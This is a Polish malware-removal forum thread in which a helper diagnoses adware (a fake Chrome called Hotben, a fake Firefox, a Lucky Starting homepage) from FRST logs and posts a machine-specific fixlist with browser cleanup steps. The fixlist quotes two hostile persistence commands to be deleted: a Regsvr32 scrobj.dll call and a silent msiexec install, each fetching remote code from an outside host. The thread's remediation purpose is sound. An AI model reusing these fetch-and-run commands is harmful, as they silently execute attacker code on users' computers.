Skocz do zawartości

[Lucky Starting] Adware - reklamy, fałszywa przeglądarka i możliwe inne


Rekomendowane odpowiedzi

Witam,

Znajomy poprosił mnie o pomoc z usunięciem problemów na jego komputerze. Została zainstalowana aplikacja Lucky Starting była główna strona startowa w FF i Chrome , najprawdopodobniej także inne warianty podobnych zagrożeń. Twierdzi także, ze FF miał zostać doinstalowany samodzielnie

Objawy:

- fałszywy Chrome, wolno startujący system, wzmożona ilość reklam, przekierowywanie na inne strony internetowe, w tym wyszukiwarki, niedziałające wtyczki.

Podejrzewam, że źródłem problemu mogą być strony porno.

 

Logi:
​FRST nie był w stanie dokonać kopii rejestru - wyskoczylo kilka bledow o braku dostępu do kluczy rejestru.

W systemie został zainstalowany przeze mnie TeamViewer w dniu dzisiejszym, celem dokończenia procesu sprawdzania systemu już zdalnie ze swojego domu.

 

 

Addition.txt

FRST.txt

Shortcut.txt

GMER.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

System jest zainfekowany przez adware. Widoczne są dwie fałszywe wyszukiwarki podszywające się pod Google Chrome oraz Mozilla FireFox (której nawet nie ma zainstalowanej w systemie). Oprócz tego inne adware: uruchamiające strony w przeglądarce, nakładające blokady typu Debugger etc. W systemie sprzątam, kasuję infekcję, resztki po programach i czyszczę pliki tymczasowe. 

 

Instalkę z DobrychProgramów mającą Asystena Pobierania kasuję z katalogu Pobrane. Ten instalator ma zintegrowane adware i kto wie czy to właśnie nie on doprowadził do infekcji - KLIK.  

 

1. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\...\ChromeHTML: -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.) 
RemoveDirectory: C:\Program Files (x86)\Hotben
RemoveDirectory: C:\Users\Janusz\AppData\Local\Hotben
Task: {0799A11B-BBCE-415E-8524-1C733F6F6689} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku 
Task: {2524CC03-F09A-46EF-892D-6174963B19D8} - \WPD\SqmUpload_S-1-5-21-2487835237-2257990825-3517168332-1001 -> Brak pliku 
Task: {44AF63F8-B7C5-4730-95AD-D0365E220B1F} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku 
Task: {77F28D2F-FA47-4C2C-B721-7C270588F307} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku 
Task: {9BF3A04E-404B-433E-A4D6-788369AFB24C} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku 
Task: {B9962562-7BA3-446C-8C2D-1001B91445AE} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku 
Task: {F0B467EC-C9B6-4E2A-8020-CDD154D3C6BD} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1QMkZWNTYcRTI1FjE8N8E4MdQYM8UcMYU1MThQM8MdNq== scrobj.dll
C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
FirewallRules: [{F2A4227C-2518-4FD8-8BF8-7B4F21DDD335}] => (Allow) C:\Program Files (x86)\Hotben\Application\chrome.exe
FirewallRules: [{A21039B9-F973-45F9-9E02-6D0CAA4F2841}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{AA08C75C-F2DB-4174-B872-5B02748EAF9E}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Janusz\AppData\Local\Firefox
RemoveDirectory: C:\Users\Janusz\AppData\Roaming\Firefox
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [117424 2017-04-18] () 
HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QMkZWNTYcRTI1FjE8N8E4MdQYM8UcMYU1MThQM8MdNq== /q
IFEO\taskmgr.exe: [Debugger] 
SearchScopes: HKU\S-1-5-21-2487835237-2257990825-3517168332-1001 -> DefaultScope {32B7ACE0-EDCA-4E79-B5E3-263115A9A6F8} URL = 
SearchScopes: HKU\S-1-5-21-2487835237-2257990825-3517168332-1001 -> {32B7ACE0-EDCA-4E79-B5E3-263115A9A6F8} URL = 
HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.) 
U2 Kitty; C:\Users\Janusz\AppData\Local\Kitty\Kitty.dll [754688 2017-04-17] (kitty.exe) [brak podpisu cyfrowego] 
R2 WindowsAppVerifierSvr; C:\ProgramData\Windows\App\Kit\ApplicationVerifier.dll [107008 2017-04-18] () [brak podpisu cyfrowego]
S2 HWDeviceService64.exe; "C:\ProgramData\DatacardService\HWDeviceService64.exe" -/service [X]
U3 ugldipob; C:\Users\Janusz\AppData\Local\Temp\ugldipob.sys [56584 2017-04-24] (GMER) [brak podpisu cyfrowego] 
S3 ew_hwusbdev; \SystemRoot\system32\DRIVERS\ew_hwusbdev.sys [X]
S3 ew_usbenumfilter; \SystemRoot\System32\drivers\ew_usbenumfilter.sys [X]
S3 huawei_cdcacm; \SystemRoot\system32\DRIVERS\ew_jucdcacm.sys [X]
S3 huawei_ext_ctrl; \SystemRoot\System32\drivers\ew_juextctrl.sys [X]
S3 huawei_wwanecm; \SystemRoot\System32\drivers\ew_juwwanecm.sys [X]
2017-04-06 12:42 - 2017-04-06 12:42 - 01255768 _____ ( ) C:\Users\Janusz\Downloads\Skype-13018-AsystentPobierania.exe
C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk
C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk
C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk
C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.Studios.PinballFx2_8wekyb3d8bbwe\Pinball.App.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Janusz\AppData\Local\Mozilla
C:\Users\Janusz\AppData\Roaming\Mozilla
C:\Users\Janusz\AppData\Roaming\Profiles
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Wyczyść i zabezpiecz przeglądarkę Google Chrome:

  • Zresetuj synchronizację (o ile włączona): KLIK.
  • Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
  • Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
  • Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
  • Ustaw tą lub jakąkolwiek inną zaufaną przeglądarkę jako domyślną - skromnie sugeruję Google Chrome - KLIK.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.
4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

hotben;firefox

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 

 

5. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 

 

6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Odnośnik do komentarza

Odnośnie do punktu 5, po pobraniu aplikacji AdwCleaner i uruchomieniu, pojawił się komunikat o nieaktualności aplikacji. Z uwagi na to, że czasami starsze wersje programu działają lepiej od nowych, a ja od sporego czasu nie jestem na bieżąco, postanowiłem korzystać z wersji programu, do której linkowano (6.045). AdwCleaner znalazł 20 zagrożeń. W wynikach wyszły 2 ścieżki. Jeśli program winien się zaktualizować, proszę o informację.

 

Jako domyślną przeglądarkę, na tę chwilę ustawiłem Microsoft Edge, która jest najbezpieczniejszym rozwiązaniem do momentu usunięcia infekcji. Załączam logi.

Punkt 2 - Chrome uruchomiłem bezporednio z lokalizacji właściwej przeglądarki. Nie było zainstalowanych podejrzanych dodatków i wyszukiwarek (przed daniem pierwszych logów była tylko Yahoo, a strona startowa luckystarting - usunięte). Zresetowano, usunięto wszystkie wyszukiwarki poza google i dodatki, zainstalowano uBlock Origin zamiast posiadanego wcześniej Adblocka Plus.

 

na taskbarze (quickLaunch) nadal są skróty do aplikacji Firefox i Chrome

Addition.txt

AdwCleanerS1.txt

Fixlog.txt

Shortcut.txt

FRST.txt

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...